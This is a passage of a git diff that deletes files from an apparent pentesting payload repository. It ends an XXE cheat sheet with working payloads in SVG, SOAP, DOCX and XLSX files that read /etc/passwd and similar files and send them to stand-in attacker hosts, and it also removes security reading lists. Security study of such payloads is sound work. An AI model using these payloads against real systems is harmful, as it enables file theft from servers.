style="fill:pink;opacity:0.7"/> - <flowRoot font-size="15"> - <flowRegion> - <rect x="0" y="0" width="200" height="200" style="fill:red;opacity:0.3"/> - </flowRegion> - <flowDiv> - <flowPara>&exfil;</flowPara> - </flowDiv> - </flowRoot> -</svg> -``` - -*xxe.xml* - -```xml -<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname"> -<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://example.org:2121/%data;'>"> -``` - -### XXE inside SOAP - -```xml -<soap:Body> - <foo> - <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]> - </foo> -</soap:Body> -``` - -### XXE inside DOCX file - -Format of an Open XML file (inject the payload in any .xml file): - -- /_rels/.rels -- [Content_Types].xml -- Default Main Document Part - - /word/document.xml - - /ppt/presentation.xml - - /xl/workbook.xml - -Then update the file `zip -u xxe.docx [Content_Types].xml` - -Tool : https://github.com/BuffaloWill/oxml_xxe - -```xml -DOCX/XLSX/PPTX -ODT/ODG/ODP/ODS -SVG -XML -PDF (experimental) -JPG (experimental) -GIF (experimental) -``` - -### XXE inside XLSX file - -Structure of the XLSX: - -``` -$ 7z l xxe.xlsx -[...] - Date Time Attr Size Compressed Name -------------------- ----- ------------ ------------ ------------------------ -2021-10-17 15:19:00 ..... 578 223 _rels/.rels -2021-10-17 15:19:00 ..... 887 508 xl/workbook.xml -2021-10-17 15:19:00 ..... 4451 643 xl/styles.xml -2021-10-17 15:19:00 ..... 2042 899 xl/worksheets/sheet1.xml -2021-10-17 15:19:00 ..... 549 210 xl/_rels/workbook.xml.rels -2021-10-17 15:19:00 ..... 201 160 xl/sharedStrings.xml -2021-10-17 15:19:00 ..... 731 352 docProps/core.xml -2021-10-17 15:19:00 ..... 410 246 docProps/app.xml -2021-10-17 15:19:00 ..... 1367 345 [Content_Types].xml -------------------- ----- ------------ ------------ ------------------------ -2021-10-17 15:19:00 11216 3586 9 files -``` - -Extract Excel file: `7z x -oXXE xxe.xlsx` - -Rebuild Excel file: - -``` -$ cd XXE -$ 7z u ../xxe.xlsx * -``` - -Add your blind XXE payload inside `xl/workbook.xml`. - -```xml -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]> -<cdl>&rrr;</cdl> -<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"> -``` - -Alternativly, add your payload in `xl/sharedStrings.xml`: - -```xml -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]> -<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst> -``` - -Using a remote DTD will save us the time to rebuild a document each time we want to retrieve a different file. -Instead we build the document once and then change the DTD. -And using FTP instead of HTTP allows to retrieve much larger files. - -`xxe.dtd` - -```xml -<!ENTITY % d SYSTEM "file:///etc/passwd"> -<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> -``` - -Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/xxeserv): - -``` -$ xxeserv -o files.log -p 2121 -w -wd public -wp 8000 -``` - -### XXE inside DTD file - -Most XXE payloads detailed above require control over both the DTD or `DOCTYPE` block as well as the `xml` file. -In rare situations, you may only control the DTD file and won't be able to modify the `xml` file. For example, a MITM. -When all you control is the DTD file, and you do not control the `xml` file, XXE may still be possible with this payload. - -```xml -<!-- Load the contents of a sensitive file into a variable --> -<!ENTITY % payload SYSTEM "file:///etc/passwd"> -<!-- Use that variable to construct an HTTP get request with the file contents in the URL --> -<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://my.evil-host.com/x=%payload;">'> -%param1; -%external; -``` - - -## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents - -From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79 - -### Disclose local file - -```xml -<!DOCTYPE doc [ - <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> - <!ENTITY % SuperClass '> - <!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config"> - <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://t/#&#x25;file;&#x27;>"> - &#x25;eval; - &#x25;error; - <!ENTITY test "test"' - > - %local_dtd; - ]><xxx>cacat</xxx> -``` - -### Disclose HTTP Response: - -```xml -<!DOCTYPE doc [ - <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> - <!ENTITY % SuperClass '> - <!ENTITY &#x25; file SYSTEM "https://erp.company.com"> - <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>"> - &#x25;eval; - &#x25;error; - <!ENTITY test "test"' - > - %local_dtd; - ]><xxx>cacat</xxx> -``` - -## References - -* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) -* [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) -* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka -* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) -* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) -* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) -* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) -* [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/) -* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by detectify -* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht -* [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean Melia @seanmeals -* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017 -* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG -* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) -* [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov -* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) -* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau -* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) -* [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10) -* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) -* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon -* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK -* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin -* [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - diff --git a/_LEARNING_AND_SOCIALS/BOOKS.md b/_LEARNING_AND_SOCIALS/BOOKS.md deleted file mode 100644 index f055810..0000000 --- a/_LEARNING_AND_SOCIALS/BOOKS.md +++ /dev/null @@ -1,43 +0,0 @@ -# Books - -> Grab a book and relax. Some of the best books in the industry. - -- [Advanced Penetration Testing: Hacking the World's Most Secure Networks by Wil Allsopp (2017)](https://www.goodreads.com/book/show/32027337-advanced-penetration-testing) -- [Android Hacker's Handbook by Joshua J. Drake et al. (2014)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html) -- [Android Security Internals: An In-Depth Guide to Android's Security Architecture by Nikolay Elenkov (2015)](https://nostarch.com/androidsecurity) -- [Attacking Network Protocols: A Hacker's Guide to Capture, Analysis, and Exploitation by James Forshaw (2018)](https://nostarch.com/networkprotocols) -- [Black Hat Go: Go Programming for Hackers and Pentesters by Tom Steele, Chris Patten, and Dan Kottmann (2020)](https://nostarch.com/blackhatgo) -- [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz (2014)](https://www.goodreads.com/book/show/22299369-black-hat-python) -- [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec) -- [Car Hacker's Handbook by Craig Smith (2016)](https://www.nostarch.com/carhacking) -- [Cyberjutsu: Cybersecurity for the Modern Ninja by Ben McCarty (2021)](https://nostarch.com/cyberjutsu) -- [Foundations of Information Security: A Straightforward Introduction by Jason Andress (2019)](https://nostarch.com/foundationsinfosec) -- [Game Hacking: Developing Autonomous Bots for Online Games by Nick Cano (2016)](https://nostarch.com/gamehacking) -- [Gray Hat Python: Python Programming for Hackers and Reverse Engineers by Justin Seitz (2009)](https://www.goodreads.com/book/show/5044768-gray-hat-python) -- [Hacking: The Art of Exploitation by Jon Erickson (2004)](https://www.goodreads.com/book/show/61619.Hacking) -- [iOS Hacker's Handbook by Charlie Miller et al. (2012)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html) -- [Metasploit: The Penetration Tester's Guide by David Kennedy (2011)](https://www.nostarch.com/metasploit) -- [OWASP Testing Guide: Stable](https://owasp.org/www-project-web-security-testing-guide/stable/) -- [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman (2014)](https://nostarch.com/pentesting) -- [Pentesting Azure Applications: The Definitive Guide to Testing and Securing Deployments by Matt Burrough (2018)](https://nostarch.com/azure) -- [Practical Binary Analysis: Build Your Own Linux Tools for Binary instrumentation, Analysis, and Disassembly by Dennis Andriesse (2019)](https://nostarch.com/binaryanalysis) -- [Practical Forensic Imaging: Securing Digital Evidence with Linux Tools by Bruce Nikkel (2016)](https://nostarch.com/forensicimaging) -- [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things by Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou and Beau Woods (2021)](https://nostarch.com/practical-iot-hacking) -- [Practical Doomsday: A User's Guide to the End of the World by Michal Zalewski (2022)](https://nostarch.com/practical-doomsday) -- [Practical Social Engineering: A Primer for the Ethical Hacker by Joe Gray (2022)](https://nostarch.com/practical-social-engineering) -- [Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski (2019)](https://nostarch.com/bughunting) -- [Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats by Alex Matrosov, Eugene Rodionov, and Sergey Bratus (2019)](https://nostarch.com/rootkits) -- [The Art of Cyberwarfare: An Investigator's Guide to Espionage, Ransomware, and Organized Cybercrime by Jon DiMaggio (2022)](https://nostarch.com/art-cyberwarfare) -- [The Car Hacker's Handbook: A Guide for the Penetration Tester by Craig Smith (2016)](https://nostarch.com/carhacking) -- [The Browser Hacker's Handbook by Wade Alcorn et al. (2014)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html) -- [The Database Hacker's Handbook, David Litchfield et al. (2005)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html) -- [The Hacker Playbook: Practical Guide To Penetration Testing by Peter Kim (2014)](https://www.goodreads.com/book/show/21846565-the-hacker-playbook) -- [The Hacker Playbook 2: Practical Guide to Penetration Testing by Peter Kim (2015)](https://www.goodreads.com/book/show/25791488-the-hacker-playbook-2) -- [The Hacker Playbook 3: Practical Guide to Penetration Testing (Red Team Edition) by Peter Kim (2018)](https://www.goodreads.com/book/show/40028366-the-hacker-playbook-3) -- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi (2009)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html) -- [The Hardware Hacking Handbook by Jasper van Woudenberg & Colin O'Flynn (2022)](https://nostarch.com/hardwarehacking) -- [The Mobile Application Hacker's Handbook by Dominic Chell et al. (2015)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html) -- [The Shellcoders Handbook by Chris Anley et al. (2007)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html) -- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto (2011)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html) -- [Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers by T.J. O'Connor (2012)](https://www.goodreads.com/book/show/16192263-violent-python) -- [Web Hacking 101](https://leanpub.com/web-hacking-101) diff --git a/_LEARNING_AND_SOCIALS/TWITTER.md b/_LEARNING_AND_SOCIALS/TWITTER.md deleted file mode 100644 index 74c3910..0000000 --- a/_LEARNING_AND_SOCIALS/TWITTER.md +++ /dev/null @@ -1,33 +0,0 @@ -# Twitter - -Twitter is very common in the InfoSec area. Many advices and tips on bug hunting or CTF games are posted every day. It is worth following the feeds of some successful security researchers and hackers. - - -### Accounts - -- [@Stök - Bug bounty hunter, cybersecurity educational content creator](https://twitter.com/stokfredrik) -- [@NahamSec - Hacker & content creator & co-founder bugbountyforum and http://recon.dev](https://twitter.com/NahamSec) -- [@dawgyg - Bug bounty hunter, reformed blackhat, Synack red team member](https://twitter.com/thedawgyg) -- [@putsi - Bug bounty hunter and white hat hacker in Team ROT](https://twitter.com/putsi) -- [@thecybermentor - Offers cybersecurity and hacking courses](https://twitter.com/thecybermentor) -- [@InsiderPhD - PhD student, occasional bug bounty hunter & educational cyber security youtuber](https://twitter.com/InsiderPhD) -- [@LiveOverflow - Content creator and hacker producing videos on various IT security topics and participating in hacking contests](https://twitter.com/LiveOverflow) -- [@EdOverflow - Web developer, security researcher and triager for numerous vulnerability disclosure programs](https://twitter.com/edoverflow) -- [@r0bre - Bug Hunter for web- and systemsecurity, iOS Security researcher](https://twitter.com/r0bre) -- [@intigriti - European ethical hacking & bug bounty platform](https://twitter.com/intigriti) -- [@Hacker0x01 - American bug bounty platform](https://twitter.com/Hacker0x01) -- [@bugcrowd - Another american bug bounty platform](https://twitter.com/Bugcrowd) -- [@hakluke - Bug bounty hunter, content creator, creator of some great pentesting tools like hakrawler](https://twitter.com/hakluke) -- [@spaceraccoon - Security researcher and white hat hacker. Has worked on several bug bounty programs](https://twitter.com/spaceraccoonsec) -- [@samwcyo - Full time bug bounty hunter](https://twitter.com/samwcyo) -- [@Th3G3nt3lman - Security Reasearch & Bug bounty hunter](https://twitter.com/Th3G3nt3lman) -- [@securinti - Dutch bug bounty hunter & head of hackers and bord member @ intigriti](https://twitter.com/securinti) -- [@jobertabma - Co-founder of HackerOne, security researcher](https://twitter.com/jobertabma) -- [@codingo_ - Global Head of Security Ops and Researcher Enablement bugcrowd, Maintainer of some great pentesting tools like NoSQLMap or VHostScan](https://twitter.com/codingo_) -- [@TomNomNom - security researcher, maintainer of many very useful pentesting tools](https://twitter.com/TomNomNom) -- [@orange_8361 - bug bounty hunter and security researcher, specialized on RCE bugs](https://twitter.com/orange_8361) -- [@d0nutptr - part-time bug hunter, Lead Security Engineer at graplsec](https://twitter.com/d0nutptr) -- [@filedescriptor - security researcher, bug hunter and content creator at 0xReconless](https://twitter.com/filedescriptor) -- [@0xReconless - Security research, blogs, and videos by filedescriptor, ngalongc & EdOverflow](https://twitter.com/0xReconless) -- [@pentest_swissky - Author of PayloadsAllTheThings & SSRFmap](https://twitter.com/pentest_swissky) -- [@GentilKiwi - Author of Mimikatz & Kekeo](https://twitter.com/gentilkiwi) diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md deleted file mode 100644 index 0584635..0000000 --- a/_LEARNING_AND_SOCIALS/YOUTUBE.md +++ /dev/null @@ -1,39 +0,0 @@ -# Youtube - -## Channels - -- [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) -- [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) -- [GynvaelEN - Podcasts about CTFs, computer security, programing and similar things.](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg) -- [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw) -- [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A) -- [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) -- [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg) -- [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained) -- [STÖK](https://www.youtube.com/c/STOKfredrik) -- [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) -- [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) -- [Nahamsec](https://www.youtube.com/c/Nahamsec) -- [Hackerone](https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw) -- [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q) -- [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw) -- [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ) - -- [HACKING GOOGLE Series](https://www.youtube.com/watch?v=aOGFY1R4QQ4) - - [EP000: Operation Aurora | HACKING GOOGLE](https://youtu.be/przDcQe6n5o) - - [EP001: Threat Analysis Group | HACKING GOOGLE](https://youtu.be/N7N4EC20-cM) - - [EP002: Detection and Response | HACKING GOOGLE](https://youtu.be/QZ0cpBocl3c) - - [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ) - - [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg) - - [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU) - -## Conferences - -- [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4) -- [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc) -- [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8) -- [The Conscience of a Hacker](https://www.youtube.com/watch?v=0tEnnvZbYek) -- [Defcon Conference](https://www.youtube.com/user/DEFCONConference/videos) -- [x33fcon Conference](https://www.youtube.com/c/x33fcon) -- [Hack In Paris](https://www.youtube.com/user/hackinparis) -- [LeHack / HZV](https://www.youtube.com/user/hzvprod) \ No newline at end of file diff --git a/_template_vuln/README.md b/_template_vuln/README.md deleted file mode 100644 index 9081230..0000000 --- a/_template_vuln/README.md +++ /dev/null @@ -1,27 +0,0 @@ -# Vulnerability Title - -> Vulnerability description - reference - -## Summary - -- [Tools](#tools) -* [Something](#something) - * [Subentry 1](#sub1) - * [Subentry 2](#sub2) - -## Tools - -- [Tool 1](https://example.com) -- [Tool 2](https://example.com) - -## Something - -Quick explanation - -```powershell -Exploit -``` - -## References - -- [Blog title - Author, Date](https://example.com) \ No newline at end of file